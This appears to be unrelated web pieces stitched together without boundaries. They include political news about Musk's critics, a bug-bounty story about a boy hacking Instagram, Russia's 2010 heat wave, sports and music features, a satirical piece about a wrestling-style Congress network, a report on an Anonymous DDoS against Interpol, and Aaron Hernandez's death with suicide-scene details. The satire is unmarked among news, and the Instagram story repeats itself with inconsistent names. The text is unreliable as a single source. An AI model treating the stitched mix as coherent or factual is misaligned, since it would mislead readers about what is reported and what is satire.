Securities and Exchange Commission filings show that Musk was the largest shareholder in both companies. The merger means that Musk could sell electric cars and solar roofs under one corporate brand.
But without taxpayer-funded support, these companies could not survive, Banister told The Daily Signal.
“Musk should not be permitted to bail out his own companies with taxpayer money,” she said. “But that's what happened with this acquisition.”
One of the blogs Banister cites as putting out what she views as skewed and misleading material can be found at Teslarati.com.
A Nov. 24 post there charges that Citizens for the Republic overlooks subsidies the oil and gas industry receives from the federal government. The post says “fake news everywhere” gives Musk good reason to be suspicious that his competitors in the fossil fuel industry lurk behind coverage that is critical of his enterprises.
Musk himself tweeted Nov. 22: “Can anyone uncover who is behind these fake pieces?”
Can anyone uncover who is really writing these fake pieces? Can't be skankhunt42. His work is better than this. https://t.co/Qs69AFMGE5 — Elon Musk (@elonmusk) November 22, 2016
“Let the trolls launch their slings and arrows Elon's way,” the Teslarati.com post says. “They will not deter him from moving toward his goal—a world where fossil fuels stay in the ground and abundant renewable electricity from the sun is the order of the day.”
Another liberal blog, “The Drive,” on Nov. 22 suggested a link between “big oil” and Citizens for the Republic. That same day, Bloomberg News ran a story about Musk and his online critics that cites the “Stop Elon Musk From Failing Again” website and raises questions about financial support for Citizens for the Republic.
The Daily Signal unsuccessfully sought comment from both blogs via Twitter.
In a press release titled “Bloomberg Smells of Musk,” Citizens for the Republic describes Bloomberg News as a “one-sided, left-wing” media operation. It says the Bloomberg article reads like a propaganda piece that overlooks the fact Musk has received billions in taxpayer funding even though his companies “show no signs of financial stability or success.”
In an online interview about his report on “internet trolls” who have been critical of Musk, Bloomberg Businessweek reporter Paul Barrett says it is difficult to “connect the dots” between Citizens for the Republic and the group's supporters.
“The dots are that we don't believe the government should prop up companies or industries, big banks, big abortion, big education, big media, or any others,” Banister said, adding:
We believe in the marketplace. When SolarCity can't make a profit, and Tesla can't make a profit, and SpaceX can't make a profit, it's not the American taxpayer who should continue to fund these companies. We are against using taxpayer subsidies to bail out failing companies, and we welcome anyone who supports our cause.
The Daily Signal sought comment from Barrett by email, but has not received a response. The Daily Signal also emailed and spoke with a Bloomberg News spokeswoman about responding to Citizens for the Republic, but the outlet has not replied.
Ronald Reagan originally established Citizens for the Republic in 1977, three years before he won the presidency. Conservative activists relaunched the political action committee in 2010 with Banister and Craig Shirley, her partner in Shirley & Banister Public Affairs, as board members.
Shirley, the author of three books on Reagan, also serves as chairman of Citizens for the Republic, a 501(c)(4) nonprofit. He is founder, chairman, and CEO of Shirley & Banister, and Banister is president of the public relations firm.
In June, Citizens for the Republic set up the Sunlight Project, an initiative “to monitor and expose corruption and cronyism at the nexus of government and business.” The “Stop Elon From Failing Again” website is an extension of this project.
By By Tim Sandle May 7, 2016 in Technology Helsinki - A ten year-old boy from Finland has hacked into Instagram, exposing a flaw in the Facebook-owned software. He has been rewarded by the company for his efforts. The flaw that Janu found was a computer glitch that allowed someone to delete comments made by other users of the site. On discovering the error, Instagram rapidly fixed the problem. As a reward for his efforts, under the Facebook “ Jani found the error in February and sent an email to Facebook. Engineers set up an account for Jani, tested his claim, and confirmed it. The company then produced a software patch to fix the problem. Speaking with So far, Facebook has paid out $4.3 million under the “bug bounty” pot, dating back to 2011. This is standard procedure for many companies, in terms of offering financial incentives to both professional and amateur computer experts to look for flaws in software. This is to avoid people passing on the flaws to those who might exploit the flaws for more nefarious reasons. Companies that use the scheme include Yahoo!, Reddit, Square and Google. At the age of 10, Jani is the youngest recipient of the prize. He is hoping to become a security researcher when he is older. The previous young computer whiz to receive a similar prize was Alex Miller from California, who received $3,000 The boy, Jani, was playing around with Instagram he discovered a security flaw on the image sharing site. Interestingly, the boy was too young to have his own account (the minimum age for joining the social network is 13 years old.)The flaw that Janu found was a computer glitch that allowed someone to delete comments made by other users of the site. According to the website Geek , the code allowed Jani to delete comments from anyone's page, even verified accounts of big names like Justin Bieber.On discovering the error, Instagram rapidly fixed the problem. As a reward for his efforts, under the Facebook “ bug bounty ” prize on offer for those who discover big flaws in one of the company's products, Jani received $10,000.Jani found the error in February and sent an email to Facebook. Engineers set up an account for Jani, tested his claim, and confirmed it. The company then produced a software patch to fix the problem.Speaking with the Finnish newspaper Iltalehti , Jani said he planned to use the money to purchase a new bike, football equipment and computers.So far, Facebook has paid out $4.3 million under the “bug bounty” pot, dating back to 2011. This is standard procedure for many companies, in terms of offering financial incentives to both professional and amateur computer experts to look for flaws in software. This is to avoid people passing on the flaws to those who might exploit the flaws for more nefarious reasons. Companies that use the scheme include Yahoo!, Reddit, Square and Google.At the age of 10, Jani is the youngest recipient of the prize. He is hoping to become a security researcher when he is older.The previous young computer whiz to receive a similar prize was Alex Miller from California, who received $3,000 from Mozilla back in 2010 at the age of 12. More about instagram, Hacking, Bugs, Facebook More news from instagram Hacking Bugs Facebook
Mikhail Voskresensky / Reuters A woman covers her nose as she walks by a fire hydrant in the town of Vyksa, in Nizhny Novgorod, Russia, on July 31, 2010
Russians are not used to heat waves. When the high temperatures that have overwhelmed Russia over the past six weeks first arrived in June, some 1,200 Russians drowned at the country's beaches. "The majority of those who drowned were drunk," the Emergencies Ministry concluded in mid-July, citing the Russian habit of taking vodka to cool off by the sea. But while overconsumption of vodka is a familiar scourge in Russia, extreme heat is not, and as the worst heat wave on record spawns wildfires that are destroying entire villages, Russian officials have made what for them is a startling admission: global warming is very real.
At a meeting of international sporting officials in Moscow on July 30, Russian President Dmitri Medvedev announced that in 14 regions of the country, "practically everything is burning. The weather is anomalously hot." Then, as TV cameras zoomed in on the perspiration shining on his forehead, Medvedev announced, "What's happening with the planet's climate right now needs to be a wake-up call to all of us, meaning all heads of state, all heads of social organizations, in order to take a more energetic approach to countering the global changes to the climate." (See pictures of the wildfires in Russia.)
For Medvedev, such sentiments mark a striking about-face. Only last year, he announced that Russia, the world's third largest polluter after China and the U.S., would be spewing 30% more planet-warming gases into the atmosphere by 2020. "We will not cut our development potential," he said during the summer of 2009 (an unusually mild one), just a few months before attending the Copenhagen climate summit, which in December failed to reach a substantial agreement on how to limit carbon emissions.
But even that pronouncement, grim as it seemed to the organizers of the Copenhagen talks, was mild compared with the broader Russian campaign against the idea that global warming is taking place. Two months before Copenhagen, state-owned Channel One television aired a documentary called The History of a Deception: Global Warming, which argued that the notion of man-made climate change was the result of an international media conspiracy. A month later, hackers sparked the so-called Climategate scandal by stealing e-mails from European climate researchers. The hacked e-mails, which were then used to support the arguments of global-warming skeptics, appeared to have been distributed through a server in the Siberian oil town of Tomsk, raising suspicion among some environmental activists of Russia's involvement in the leak. (See pictures of Medvedev and Vladimir Putin on vacation.)
"Broadly speaking, the Russian position has always been that climate change is an invention of the West to try to bring Russia to its knees," says Vladimir Chuprov, director of the Greenpeace energy department in Moscow. Case in point: when Medvedev visited Tomsk last winter, he called the global-warming debate "some kind of tricky campaign made up by some commercial structures to promote their business projects." That was two months after the Copenhagen talks. But Medvedev's climate-sensitive comments on Friday, Chuprov says, could finally mark the start of a policy shift. "You don't just throw comments like that around when you are the leader of the nation, and if you look at what is happening with this heat wave, it's horrible. It's clearly enough to shake people out of their delusions about global warming."
The heat wave first started alarming authorities in June, when local officials recorded abnormally high fatalities on Russia's beaches. At the same time, a devastating drought was withering Russia's crops. As of July 30, some 25 million acres (about 10 million hectares) of grain had been lost, an area roughly the size of Kentucky  and growing. Then last week, fires that had been ignored for days by local officials began spreading out of control. By Aug. 2, they had scorched more than 300,000 acres (121,000 hectares) and destroyed 1,500 homes in more than a dozen regions, some of which declared a state of emergency. Scores of people have been killed in the fires, and in the outskirts of Moscow, burning fields of peat, a kind of fuel made of decayed vegetation, periodically covered the city in a cloud of noxious smoke, making it painful to breathe in parts of the Russian capital.
Medvedev has not been the only person in Russia to link the ongoing heat wave to climate change. Alexei Lyakhov, head of Moscow's meteorological center, tells TIME it is "clearly part of a global phenomenon" that is hitting Russia. "We have to start taking systemic measures of adaptation. It's obvious now. Just like human beings at one point took steps to adapt to the Ice Age, we now have to adapt to this," he says, citing cuts to carbon emissions as one of the necessary adaptations.
Now that Medvedev is also acknowledging the effects of climate change, Russia's official line on the subject could start to change, Chuprov says. But he warns that convincing the public of the threat from global warming may be difficult. "The status quo can change quickly in the minds of bureaucrats if the leadership gives the signal. But in the minds of the people, myths are much more difficult to uproot," he says. As if to prove the point, Russia's largest circulation newspaper, Komsomolskaya Pravda, ran a headline on July 31 that asked, "Is the Russian heat wave the result of the USA testing its climate weapon?" The daily's answer was "Yes, probably." (See pictures of Russians celebrating Victory Day.)
But if Medvedev stands by his pronouncements, there may turn out to be a bright side to Russia's devastating weather: one of the nations most responsible for driving climate change may finally start trying to do something about it.
Ford is making significant investments in the Chinese market. Kamran Jebreili / AP
Once criticized for their lack of innovation, American car companies are making heavy investments in electric and autonomous cars. But Ford executive chairman William C. Ford Jr. thinks China will be the most promising market for the development and sale of electric vehicles, according to the New York Times.
"It's clearly the case that China will lead the world in E.V. development," Ford Jr. said on Tuesday while speaking in Shanghai.
This may explain why Ford recently announced a $756 million joint venture with Chinese auto company Zotye Auto to produce and sell electric cars in China. Ford hopes to have 15 models ready by 2025.
Ford is not the only car manufacturer developing an aggressive strategy in China, as General Motors, Daimler, and Volkswagen are making similar investments. They have been encouraged by China and Beijing's governments, which have put significant resources behind electric vehicle manufacturing and have introduced regulations that mandate car companies sell a greater proportion of electric and hybrid vehicles or get shut out of the world's biggest car market.
Car manufacturers may also find consumers who are more willing to make the switch from gas to electric-powered vehicles. Ford has indicated its market research points to a consumer base that is less pessimistic about how far electric cars will be able to travel per charge, among other potential concerns.
Photo by Megan Holmes
Before Sleater-Kinney went on indefinite hiatus in 2006, Corin Tucker's feral wail was one of the most righteous, powerful, earth-shattering sounds in all of indiedom. But since then, we've been largely deprived of that voice. Tucker has sung backup on a few Eddie Vedder solo songs, but she's mostly disappeared from the music world, taking time off to be a mom.
When we spoke to her Sleater-Kinney bandmate Carrie Brownstein last month, though, Brownstein mentioned that Tucker was at work on a solo album for Kill Rock Stars. And now, lo and behold, Tucker has confirmed that she's well into the process of recording that album, which she hopes to release in October.
The album doesn't have a title or a release date yet, but Tucker's been at work in a Portland studio, teaming up with Unwound's Sara Lund and Golden Bears' Seth Lorinczi. In a Portland Mercury interview, Tucker about the process of getting back to music and how the album might eventually sound. She mentions that she plays acoustic guitar on the record, and that "It's definitely more of a middle-aged mom record, in a way. It's not a record that a young person would write... There's some sadness, some reinvention, some rebirth. I think the goal for me is to write some good stories."
Musically, she says it may be "more traditional in some of the arrangements" than Sleater-Kinney. A few intriguing reference points are mentioned: the Slits, the Raincoats, the English Beat, and Sinead O'Connor's The Lion and the Cobra.
She doesn't expect to do any full-scale international touring behind the project, though. Tucker mentions that she'll probably play a few shows on both coasts, and, hopefully, the odd festival: "We're doing a creative project, with a really low budget, on a really small scale, and [we'll] do a handful of shows to have people hear about the record."
In an IFC interview last month, Brownstein mentioned that Sleater-Kinney could return in oh, say, five years. In that Portland Mercury interview, Tucker seems to echo that noncommittal but awesome sentiment: "The door is open. We ended things on a hiatus, so that it was always something that could happen in the future. You know, I'd love to live a long productive life and do a lot of different things. This has been the challenge of trying different musical styles, and I'd like to do more of that-- regardless of Sleater-Kinney or other projects."
I guess I just can't stop. X3 I plan to make these two into custom ponies as well. For Annila, I'm just waiting on her hair to come in the mail and I'll start taking that Cheerilee pony apart. CX Meg made the original design for her. Meg's much better at drawing cartoony ponies then I am. As for Emila, I had to design her because I am way to excited to make her! ;; She will be the first pony we'll have to dye, so we'll be starting with a Rarity pony, de-horning her, dyeing her gray blue, and putting stitches all over her! I want her hair already! XDMeg makes them so cute! ♥ And yes, I'll also be making a Wolfe pony at some point. :DSo what do you think of the Emila design, Meg? 8D
As Liverpool legend Jamie Carragher once said: “If you're a full-back, you're either a failed winger or a failed centre-back. No one grows up wanting to be the next Gary Neville.” It was, of course, a partial jibe at his Sky Sports colleague, but Carragher had a point. The full-back position is something of an enigma in football, a role which so few players have ever truly mastered. Several individuals stand out, though.
The likes of Cafu, Roberto Carlos, Ashley Cole, Dani Alves and Philipp Lahm are some of the finest players of their craft in recent times but a cursory look around Europe's top leagues today will reveal a dearth of truly high-quality full-backs.
Given that approximately only 20 percent of professional footballers are naturally left-footed, it follows that elite-level left-backs are the rarest of breeds in the modern game. While David Alaba and the Brazilian trio of Alex Sandro, Marcelo and Filipe Luis are among the few who can be considered in the top-bracket, the Premier League arguably does not have a single left-back who could be legitimately considered as world-class.
Tottenham Hotspur's Danny Rose comes closest, but even he fails to match up to the very best in his position outside of England and in past seasons in the Premier League.
It is unsurprising, perhaps, given the complexities of the role and what it demands. The modern full-back must be a competent defender while simultaneously providing much of their team's width as a crucial attacking outlet. In the respective tactical systems deployed by the likes of Jürgen Klopp and Mauricio Pochettino, the absence of orthodox wingers means that the full-backs are tasked with offering virtually the only consistent sources of width and delivery into the box from wide areas.
An exceptional level of fitness and stamina is, therefore, an essential requirement of any top-level full-back, while a burst of pace is also an important quality, as is the technical ability to cross consistently and accurately into the box to create goal-scoring opportunities. It's a hugely extensive and complex skill set which very few players possess, requiring a higher level of physical endurance and tactical intelligence than virtually every other position on the field.
It is often that case that modern full-backs are very useful and willing attackers but have major defensive deficiencies. In the Premier League era, two figures instantly stand out as the finest left-backs in England – Ashley Cole and Patrice Evra – who both possessed the perfect balance and blend of defensive and offensive qualities required to truly excel as specialists in the role.
Yet there is a third figure, whose name is rarely ever mentioned in the conversation around the Premier League's best left-backs, whose brilliance has seemingly all but faded into obscurity since leaving Liverpool in the summer of 2012.
Having progressed through the São Paulo youth system, Fábio Aurélio played a crucial role in Rafael Benítez's Valencia side that won the club's first LaLiga title in 31 years in the 2001/02 season, before going on to establish himself as one of the finest left-backs in Spain, netting double figures in goals in the 2002/03 season.
It would be the presence of Benítez that would eventually lure Aurélio to England, joining Liverpool on a Bosman transfer in July 2006 following the expiration of his six-year contract at Valencia, becoming the first ever Brazilian footballer to play for the Merseyside club.
Making his debut in Liverpool's 2006 Community Shield victory against Chelsea, Aurélio would become a key cog in Benítez's side throughout the 2006/07 season, with Aurelio showcasing his tremendous creative ability with two assists, for Peter Crouch and Daniel Agger, as Liverpool ran out 4-1 victors over Arsenal in March 2007.
A month later, however, an Achilles tendon injury sustained in Liverpool's Champions League clash with PSV ended Aurélio's debut season, and it would come to serve as a warning sign for the injury-ravaged seasons that would follow the Brazilian throughout his career in England.
Read | How Marcelo replaced the irreplaceable Roberto Carlos
A 3-1 victory against Bolton in March 2008 would see Aurélio bag his first goal for the club, dispatching a sumptuous volley into the top corner from 20-yards, following a Xabi Alonso corner. While John Arne Riise had previously built a reputation for his lethal left foot during his time at Liverpool, Aurélio's ability to strike a ball so cleanly with such power was heavily reminiscent of the Norwegian.
It would prove not to be a one-off either, as two months at the back end of the 2008/09 season would see Aurélio strike two of the sweetest and technically outstanding goals in Liverpool's recent history. The first, in March 2009, a wicked free-kick against Manchester United at Old Trafford, would help Liverpool to an emphatic 4-1 victory against their bitter rivals.
The second was an ingenious piece of improvisation as Aurélio bent a free-kick low into the bottom corner past a stationary Petr Čech to give Liverpool a 1-0 lead against Chelsea in the second leg of a Champions League quarter-final tie. The match ultimately culminated in Liverpool's exit from the competition following an enthralling encounter and a 4-4 final scoreline after Chelsea had won the first leg 3-1 at Anfield, but Aurélio's goal is one that lives long in the memory. The audacity to even attempt the shot when every player expected a cross was one thing – the technique to execute it was simply sublime.
In the summer of 2009, however, Aurélio picked up an injury while playing beach football with his children – the kind of bad luck which would come to characterise his professional career. Such was the regularity of his injuries that Liverpool offered Aurélio a pay-as-you-play deal in May 2010, which he duly declined, leading Benítez to announce the Brazilian's imminent departure from the club. The Spaniard himself would exit Anfield that summer, to be replaced by Roy Hodgson – a man whose brief but dour spell on Merseyside would leave a grim legacy as Liverpool plunged into a state of despair under his management.
One of Hodgson's first significant acts as manager was to re-sign Aurélio, offering him a new two-year contract which saw the Brazilian return for what was technically his second spell at the club in August 2010.
It seemed a smart decision at the time but Aurélio's body would never allow him to fulfil anything near his vast potential, picking up another Achilles injury at the start of the 2010/11 season, eventually leaving Liverpool under the management of Kenny Dalglish in the summer of 2012 after having been limited to just three appearances in his final season at the club due to a knee ligament rupture.
After making just 134 appearances in six seasons at the club, with four goals and 14 assists to his name, Aurélio returned to his home country as a free agent, joining Grêmio, the side where his compatriot, Lucas Leiva – similarly plagued by injuries but who secured a decade of service at Liverpool – originally came from.
The injuries would not relent, however, and Aurélio announced his retirement from the professional game in 2013, aged 34. He never made a senior international appearance for his country, despite having been called up by Brazil in 2009, only to withdraw from the squad due to injury.
Benitez spoke extremely highly of the Brazilian, claiming: “He can cross the ball superbly and he is maybe a better passer of the ball than Xabi Alonso.”
Given Alonso's reputation as one of the finest midfielders and passers of the last decade in Europe, such extraordinary praise speaks volumes of the Brazilian's capabilities. This was a left-back who was not only able to defend well, bomb forward and cross the ball from out wide; Aurelio played the position with such sophistication, able to dictate and control games from the left-back position with his switching of play and quality in possession, as well as being an outstanding specialist set-piece taker, also displaying his tactical intelligence and adaptability in central midfield on several occasions when called upon.
Holding dual citizenship between two of football's greatest nations, Aurélio combined Italian defensive steel with Brazilian flair – he had everything you could possibly want in an ideal modern full-back. Ever since the days of Riise, Liverpool have long struggled for quality in the left-back position. The likes of Emiliano Insúa, Andrea Dossena and José Enrique have all come and gone – Aurélio, though, was in a class of his own.
His was a career which promised so much and could have delivered so much more success but was ultimately curtailed by a plague of injuries that hindered Aurélio from fulfilling the true extent of his ability. In a similar fashion to the plight of Danish Liverpool defender Daniel Agger, one can only wonder about the heights Aurelio might have scaled had his body not failed him.
When fit, however, he was right up there with the very best in his trade, and it is a great shame that his talents are so seldom recognised and spoken of. During his relatively brief time on the pitch, Aurélio showed how he deserves – with little doubt in my mind – to be considered among the finest left-backs the Premier League has seen.
By Joel Rabinowitz @joel_archie
WASHINGTON, DC–At a press conference Monday, pro-wrestling tycoon and entrepreneur Vince McMahon unveiled his latest broadcasting venture: X-SPAN, a 24-hour cable network that promises “in-your-face, X-treme lawmaking coverage that puts C-SPAN to shame.”
“On March 24, everything you know about the legislative process goes up in flames,” McMahon said. “Get ready for bone-crunching, smashmouth 21st-century lawmaking.”
Advertisement
“C-SPAN is for wimps,” McMahon added. “They're a bunch of grannies.”
X-SPAN will make its debut at noon in the Bicameraldome, a $460 million, state-of-the-art facility McMahon built to house his new cast of legislators. Opening debate will focus on the Insurance Deregulation Act, an “X-plosive” new bill that would give large insurance firms greater leeway in investing in foreign holdings. The bill's sponsor, X-Representative Big Kahuna Joe (R-HI), vowed to reporters that he will “debate any opponent, any time, anywhere, regarding the merits of this bill.”
According to the terms of the new McMahon-imposed legislative process, X-Representatives from all 50 states will introduce bills to the Big Bad House Of Pain. Bills passed by a simple majority will be run through The Gauntlet Of Warriors, a hard-core third house of Congress where proposed legislation must survive not only a floor vote but a vicious beating with spiked clubs. If the bill survives, it moves on to the X-Senate and then to the president, who can then either sign it or challenge its sponsor to a chainsaw joust. If defeated in the joust, the bill's sponsor is banished for all eternity to Capitol Hell.
Advertisement
In another move designed to stoke viewer interest, legislators will be allowed and even encouraged to date Senate pages, a bevy of short-skirted former strippers dubbed G.L.O.S.S.–the Gorgeous Ladies Of Senatorial Service.
“These gals,” McMahon said, “are real sluts.”
McMahon also promised to make congressional races more “X-citing” by lifting restrictions on soft money, electioneering, and throwing dust into an opponent's face to blind him. McMahon said he hopes that de-emphasizing “boring old ethics” will lead to more rivalries and betrayals, spicing up coverage.
Advertisement
For the upcoming legislative year, McMahon is grooming as a leading villain X-Rep. Big Chief Tomahawk (D-WY), a bare-chested Sioux chief famous for his “Warrior Shriek” filibusters. As for breakthrough stars, McMahon is touting The All-American Boy (R-KS), a strapping, blond “good” X-Senator who takes down opponents of his bills with his signature finishing move, the “Majority Whip.”
Rumors are also swirling around Darkshade (I-Nether Zone), an enigmatic, masked X-Senator who never speaks and always appears with Nevermore, his chief advisor. According to Nevermore, the demons of Cataclysma will break free of their unholy bonds on Halloween during the pay-per-view Senate Slamma-Jamma Damnationals–unless Darkshade's revisions to the Family Medical Leave Act are approved before the stroke of midnight.
Despite McMahon's confidence in his new venture, political experts remain skeptical. Commenting on last Saturday's exhibition session, Dr. Anthony Wingfield of Harvard's John F. Kennedy School of Government said: “This strikes me as a crass attempt to take a perfectly good political process and make it more exploitative and titillating. If X-Rep. Whack Daddy (D-MI) throws a smoke bomb at X-Rep. J.P. Moneybags (R-CT) because he made romantic overtures to the Beautiful Veronica, that does not make for good government, however satisfying it may be on a primal level.”
Advertisement
X-SPAN is also drawing fire from conventional lawmakers, who subscribe to the old-school, “constitutionally mandated” process of lawmaking.
“The very idea of participatory democracy demands that we, the elected Congress, have full authority to sponsor and vote upon the laws of the land,” said Sen. Don Nickles (R-OK), a “real” senator from Oklahoma. “This ‘Bunko The Evil Clown' character may consider himself to be acting as senator for the citizens of Oklahoma, but the people know that the men they elected, James Inhofe and myself, are their real representatives in the senate.”
Continued Nickles: “Besides, that thing where Bunko and [Sen.] The Gator [(R-FL)] double-teamed [Sen.] Billy Bob Banjo [(D-AL)] and hypnotized him into voting against his own fair-housing bill? That was totally fake.”
UPDATE: A source close to the situation in Anonymous confirmed that at least a few supporters hit the Interpol website with an attack aimed at taking it offline, shortly after news of the arrests.
------
Supporters of the loose-knit hacker collective Anonymous temporarily forced the main website for Interpol offline this evening, after the international police group announced it had arrested 25 suspected supporters.
The site www.interpol.int was unreachable for 20-30 minutes and appears to be loading again, albeit slowly.
This could have been the result of a Distributed Denial of Service (DDoS) attack by supporters of Anonymous. For this, either a hacker uses a botnet, or hundreds of volunteers use a special web tool flood a site with enough junk traffic to take it offline. (In such a short space of time a botnet looks more likely.)
Moments ago a senior Twitter account for Anonymous, AnonymousIRC, tweeted: "interpol.int seems to be #TangoDown. We can't say that this surprises us much."
Another prominent Twitter account holder with Anonymous added, "Looks like interpol.int is having some traffic issues. Now who would have expected that?"
The attack comes after as police conducted raids in dozens of cities across Europe and Latin America as part of "Operation Unmask," which started in mid-February.
Interpol said the operation responded to cyber-attacks in Argentina, Chile, Colombia and Spain, that hit the Colombian Ministry of Defence the presidency, Chile's Endesa electricity company and its National Library, among others.
According to Interpol's announcement, police from Argentina, Chile, Colombia and Spain seized 250 items of computer equipment and mobile phones, credit cards and cash at 40 premises in 15 cities. The suspects ranged in age from 17 to 40.
In a separate incident, police in Spain arrested four other suspected supporters of Anonymous, accused of taking websites offline and leaking sensitive data.
A son of a Filipino domestic worker, who was born-and-raised in Hong Kong, has lost his fight for permanent residency. Five judges at the Court of Final Appeal agreed unanimously that Joseph James Gutierrez, 17, does not qualify for permanent residency under Article 24 of the Basic Law.
His mother, Josephine Gutierrez, has worked in Hong Kong as a helper since 1991. Joseph had been present in the city for more than 7 years, with only short gaps as he visited the Philippines. The judges said that he did not meet the criteria for being “ordinarily” resident.
His lawyer, Gladys Li, told the court earlier this month that her client “was evidently living in Hong Kong. He was ordinarily living in Hong Kong.” Gutierrez was also learning Chinese and Cantonese, according to Hong Kong News.
I just received my FirstTech Choice mastercard (I applied right after the application became available and was already a member). Here's the CVM list (copied from the saved XML file):
1. Apply succeeding CV rule if this rule is unsuccessful: Enciphered PIN verified online - If terminal supports the CVM
2. Apply succeeding CV rule if this rule is unsuccessful: Enciphered PIN verification performed by ICC - If terminal supports the CVM
3. Apply succeeding CV rule if this rule is unsuccessful: Plaintext PIN verification performed by ICC - If terminal supports the CVM
4. Fail cardholder verification if this CVM is unsuccessful: Signature (paper) - If terminal supports the CVM
5. Fail cardholder verification if this CVM is unsuccessful: No CVM Required - If terminal supports the CVM
I received the PIN a few days ago. Card came in today's mail.
FALL RIVER, Mass. -- Former NFL star Aaron Hernandez's conviction in a 2013 murder can be erased because he died before his appeal was heard, a judge ruled Tuesday.
Judge E. Susan Garsh said case law in Massachusetts has long established that defendants who have not had the merits of their appeals decided before they die have the right to have their convictions vacated. She said she was compelled to follow it.
Aaron Hernandez commits suicide while serving life sentence
The former New England Patriots tight end hanged himself in his prison cell last month while serving a life sentence on a first-degree murder conviction in the death of semi-professional football player Odin Lloyd. He died five days after being acquitted in a separate double slaying in 2012.
A suicide note Hernandez wrote to his fiancee said "(YOU'RE RICH)", and implored her to "tell my story fully, but never think anything besides how much I love you." The note was released Friday as a part of court documents filed by prosecutors as part of their efforts to convince a judge to deny the request to vacate the former NFL star's murder conviction, CBS Boston reported.
Lawyers for Hernandez had argued that the state's highest court had applied the legal doctrine "without exception," even in cases of suicide. They said his conviction wasn't considered final because the automatic appeal he was entitled to had not been heard at the time of his death.
Prosecutor Patrick Bomberg had argued that Hernandez "should not be able to accomplish in death what he could not accomplish in life."
But Garsh rejected the argument that Hernandez had forfeited his right to appeal by taking his own life, saying no one can ever know for sure why Hernandez killed himself.
Hernandez's appellate attorney, John Thompson, told reporters after the hearing that he believes it's still uncertain as to whether Hernandez took his own life.
Legal analyst on Aaron Hernandez's death
Thompson says he has recent correspondence from Hernandez in which he was interested in pursuing an appeal of his conviction. Thompson also said because Hernandez died in prison, it will be difficult to definitively determine how he died.
Hernandez's lead attorney in his recent double murder trial, Jose Baez, has pledged to do an independent investigation into his death.
State police said in an investigative report that Hernandez was found naked on April 19 and hanging from a bed sheet tied around the window bars of his cell. Correction officers found that cardboard had been shoved into the tracks of Hernandez's cell door to prevent the door from opening. Hernandez also had put shampoo on the floor to make it slippery, the report states.
An autopsy performed by the state medical examiner's office determined the cause of Hernandez's death was asphyxia by hanging and the manner of death was suicide.
Hernandez, who grew up in Bristol, Connecticut, and played football at the University of Florida, was considered an up-and-coming star during his three seasons with the Patriots. He had a $40 million contract with the Patriots when he was arrested and charged on June 26, 2013 in the death of Lloyd, who was found shot to death on June 17, 2013 in an industrial park near Hernandez's North Attleborough home. Hernandez was 23 at the time and was cut from the team hours after his arrest in the killing.
Goblins and Gnomes are fighting for supremacy on the Isle of Thieves.
The choice is yours.
The world has been abandoned by its gods and is scarred from the rampage
of the Titans. Humanity is struggling to regain strength and rally its forces. You, however, have more pressing concerns:
Your own life has been shattered and you must set off to reclaim what is lost amidst the darkness that is spreading throughout the world. Who knows, maybe you'll even save the world at the same time?
Three threads of destiny lie before you. Three ways to rise up against the
Titans and regain your soul. Which path will you take?
The Enhanced Edition on PlayStation 4 now offers a graphical quality level comparable with the “Ultra” settings on the original PC release and even surpasses this original's visuals in a number of areas: with higher resolution textures across the board, the introduction of new state of the art post-process effects such as bokeh depth of field and HDR bloom, and an all-new volumetric cloud system that adds even more spectacular skies and sunsets to the dynamic day-night cycles.
The enhanced edition also includes previously released DLC:
· “Adventure Garb”- armour for the nameless hero that aids him in his journeys through the dangers of the unknown wilderness
· “Fog Island”: a fully explorable additional island where a stranded Inquisition raiding party is searching for new territory in a world where madness seems to spread. Help them unveil the deadly secret found in this strange place.
· “Uprising of the Little Guys”‘: a second additional area known as “The Isle of Thieves”, where Goblins and Gnomes are fighting for supremacy and where the nameless hero must save the Gnomes and their culture from impending annihilation.
Annually, London Borough hosts the Camden's Business Awards where a range of local companies, large and small, were up for recognition for their contribution to innovation, the local economy, design and the creation of new job opportunities.
I was there to support the Accessible Environments team of the design and engineering company Arup who over several years have worked tirelessly to support our work as a small local charity – we were initially approached by this team because they were interested in doing some fundraising for a local charity that supported disabled people.
We soon found further common ground, and the relationship has since led to Arup training service users and staff to carry out access audits and providing placements for young people with a learning disability in their high-tech, high performance and yet awesomely inclusive work environment.
Our relationship with Arup really exemplifies a voluntary sector organisation and a business working together at its best. What I've learned is that when the corporate world engages with charities and voluntary sector organisations, some key elements determine the long-term value achieved. Below I identify 3 of them:
Shared values
One is around the importance of shared values, in this case focusing on a genuine commitment to pursuing inclusion and community participation. The most effective outcomes come from working with businesses like Arup that embrace the same outcomes we care about and approach them with the same respect, rigour and commitment.
That attitude is also demonstrated by the staff of John Lewis, Oxford Street, when they take our students on work placements throughout the store. They have a genuine personal commitment to helping young people with a learning disability succeed. That's shown wonderfully when we have events at the store to mark student achievements and staff from all departments flock to take part in the celebrations – not because they are told to or have to but because, like our supporters at Arup, they care about the lives and progress of the young people their company hosts.
Last year, I also spent an evening at the 15th birthday celebrations of The Front Yard Company a small social enterprise who share their beautifully designed building with a community of other makers and designers across the road from our offices. My invitation came about because, over the last few years, due to some wonderfully supportive and collaborative interactions with the Front Yard Company. They designed and supplied the plant lockers which decorate the road outside our building and provide places for cyclists to securely lock their bikes. Most importantly, they also worked with our students with a learning disability to place and fill them with bulbs and bushes.
The celebrations were a wonderfully warm and vibrant evening with the diverse guests and speakers showing how deeply embedded this little company is in their part of North London. The company chose to mark their place and story in the community by highlighting organisations nearby, including Elfrida Rathbone Camden (ERC). The company is so physically close to our location they see our young people, families, and staff coming in and out every single day. They value all our stakeholders as neighbours and contributors to the local community too.
Respect
Secondly, it is vital to have respect for the skills that exist on both sides of the relationship – the partnership has been about mutual learning and especially a recognition that we all learn from the experiences of service users. It's important to state that this is a learning process that flows both ways too. Arup's Accessible Environments team tell me that working with our service users have improved their understanding of some of the day-to-day barriers that the built environment presents.
Apparently, there is little in today's building codes and standards which directly addresses the requirements of people with neuro-diverse needs. An added benefit of working with charities, it can help sharpen professional insights and skills on the side of the business partner too. Much as with the relationship with local authorities, it's important that voluntary organisations and their service users are not just seen as absorbing resources. We want businesses to see their interactions with us as beneficialal opportunity as well.
Pragmatic support
Lastly, it has been really important for ERC that our corporate partners whose resources are so much greater understand the limitations and pressures on our side (such as having to prioritise the demands of service delivery over fundraising) to make sure the support offered is pragmatic and enables real change. Ongoing access to work placements like those described above has helped our learners build their self-esteem, and overcome barriers around access to academic qualifications, role models and confidence in the workplace.
Practical support can come in other ways too like that given to us by Bikes for Good Causes (BGC) a Wood Green social enterprise that sells good quality, donated bikes and also provides a full bicycle repair and maintenance service.
